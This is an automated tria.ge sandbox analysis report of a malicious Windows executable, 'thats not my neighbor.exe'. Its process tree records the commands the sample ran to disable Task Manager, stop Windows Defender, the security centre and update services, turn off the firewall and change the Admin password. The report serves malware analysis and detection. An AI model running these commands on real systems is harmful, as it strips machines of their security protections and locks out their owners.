Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Resubmissions
26/07/2024, 19:00
240726-xnn2xsyarn 8Analysis
-
max time kernel
30s -
max time network
37s -
platform
windows10-2004_x64 -
resource
win10v2004-20240709-en -
resource tags
arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system -
submitted
26/07/2024, 19:00
Static task
static1
Behavioral task
behavioral1
Sample
thats not my neighbor.exe
Resource
win10v2004-20240709-en
General
-
Target
thats not my neighbor.exe
-
Size
8KB
-
MD5
c6bffae52e9552a22a1aee2993ee361c
-
SHA1
9799422474b327cc48e7d8ca1029d9f4ef1f2900
-
SHA256
3bdc58e1586f13c2235facad41e048e9475fb7a0f3cf28f106fbc496ddba4c3e
-
SHA512
e9f4a95e9469d4aa45b94879c57d5f296c3d2194af6007865943fcb9ebd719f73815e65557e22f83c605d973924b12a340f6d29bc23e3baa7496a34d4cbcc2ed
-
SSDEEP
192:QLTeeNdaLixSepSnm/VunlYJLLLTuEFNZEk9qaP:QLTtdaLiyuhPLTuEFzETa
Malware Config
Signatures
-
Disables Task Manager via registry modification
-
Modifies Windows Firewall 2 TTPs 1 IoCs
pid Process 3552 netsh.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1176886754-713327781-2233697964-1000\Control Panel\International\Geo\Nation thats not my neighbor.exe Key value queried \REGISTRY\USER\S-1-5-21-1176886754-713327781-2233697964-1000\Control Panel\International\Geo\Nation cmd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
Kills process with taskkill 1 IoCs
pid Process 912 taskkill.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1176886754-713327781-2233697964-1000_Classes\Local Settings cmd.exe -
Runs net.exe
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 912 taskkill.exe -
Suspicious use of WriteProcessMemory 34 IoCs
description pid Process procid_target PID 3456 wrote to memory of 2672 3456 thats not my neighbor.exe 84 PID 3456 wrote to memory of 2672 3456 thats not my neighbor.exe 84 PID 2672 wrote to memory of 4160 2672 cmd.exe 86 PID 2672 wrote to memory of 4160 2672 cmd.exe 86 PID 4160 wrote to memory of 5100 4160 net.exe 87 PID 4160 wrote to memory of 5100 4160 net.exe 87 PID 2672 wrote to memory of 2856 2672 cmd.exe 100 PID 2672 wrote to memory of 2856 2672 cmd.exe 100 PID 2672 wrote to memory of 2300 2672 cmd.exe 101 PID 2672 wrote to memory of 2300 2672 cmd.exe 101 PID 2672 wrote to memory of 4124 2672 cmd.exe 102 PID 2672 wrote to memory of 4124 2672 cmd.exe 102 PID 4124 wrote to memory of 2452 4124 net.exe 103 PID 4124 wrote to memory of 2452 4124 net.exe 103 PID 2672 wrote to memory of 852 2672 cmd.exe 104 PID 2672 wrote to memory of 852 2672 cmd.exe 104 PID 852 wrote to memory of 1404 852 net.exe 105 PID 852 wrote to memory of 1404 852 net.exe 105 PID 2672 wrote to memory of 912 2672 cmd.exe 106 PID 2672 wrote to memory of 912 2672 cmd.exe 106 PID 2672 wrote to memory of 2352 2672 cmd.exe 107 PID 2672 wrote to memory of 2352 2672 cmd.exe 107 PID 2352 wrote to memory of 3572 2352 net.exe 108 PID 2352 wrote to memory of 3572 2352 net.exe 108 PID 2672 wrote to memory of 4036 2672 cmd.exe 109 PID 2672 wrote to memory of 4036 2672 cmd.exe 109 PID 4036 wrote to memory of 3408 4036 net.exe 110 PID 4036 wrote to memory of 3408 4036 net.exe 110 PID 2672 wrote to memory of 3552 2672 cmd.exe 111 PID 2672 wrote to memory of 3552 2672 cmd.exe 111 PID 2672 wrote to memory of 3028 2672 cmd.exe 112 PID 2672 wrote to memory of 3028 2672 cmd.exe 112 PID 3028 wrote to memory of 1176 3028 net.exe 113 PID 3028 wrote to memory of 1176 3028 net.exe 113
Processes
-
C:\Users\Admin\AppData\Local\Temp\thats not my neighbor.exe"C:\Users\Admin\AppData\Local\Temp\thats not my neighbor.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3456 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cmd.bat" "2⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2672 -
C:\Windows\system32\net.exenet user Admin *3⤵
- Suspicious use of WriteProcessMemory
PID:4160 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user Admin *4⤵PID:5100
-
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\msg.vbs"3⤵PID:2856
-
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_SZ /d 1 /f3⤵PID:2300
-
-
C:\Windows\system32\net.exenet stop "SDRSVC"3⤵
- Suspicious use of WriteProcessMemory
PID:4124 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SDRSVC"4⤵PID:2452
-
-
-
C:\Windows\system32\net.exenet stop "WinDefend"3⤵
- Suspicious use of WriteProcessMemory
PID:852 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "WinDefend"4⤵PID:1404
-
-
-
C:\Windows\system32\taskkill.exetaskkill /f /t /im "MSASCui.exe"3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:912
-
-
C:\Windows\system32\net.exenet stop "security center"3⤵
- Suspicious use of WriteProcessMemory
PID:2352 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "security center"4⤵PID:3572
-
-
-
C:\Windows\system32\net.exenet stop sharedaccess3⤵
- Suspicious use of WriteProcessMemory
PID:4036 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop sharedaccess4⤵PID:3408
-
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode-disable3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:3552
-
-
C:\Windows\system32\net.exenet stop "wuauserv"3⤵
- Suspicious use of WriteProcessMemory
PID:3028 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "wuauserv"4⤵PID:1176
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
468B
MD52b9ccce74e81c3cabce2fb1514677509
SHA12341cd92d99fec49c5159ce211c3669433857a9a
SHA25630ec46b57b19643023ba0446487665dacf706eb15a0d246f75cfa254b8fadba3
SHA5123b4b0676f39de4edb5fb1bf1537309bef0d481c5c3f5d8f741a5b69a809d8167b27737bd07c8d71fd540b715cc9cf33f528603e1e4d9f68dfaa94d00d1c01d2b
-
Filesize
47B
MD55d4eba0009c1dd2bf2cff5511895e871
SHA105dfce10a23414969a666d8fc515995907c68b94
SHA2560eb06871785e054d02e424877f0345aeffa7f5f21cfebb0cc55c879b1bc9d69a
SHA512cfce66eb85c4914fded6abd600c4c6c351d918b996923bb027cb52594bbbb0386905b68b06f31ac27ae4a09d9c8652d15644038f9b9604632d69ef606248ec79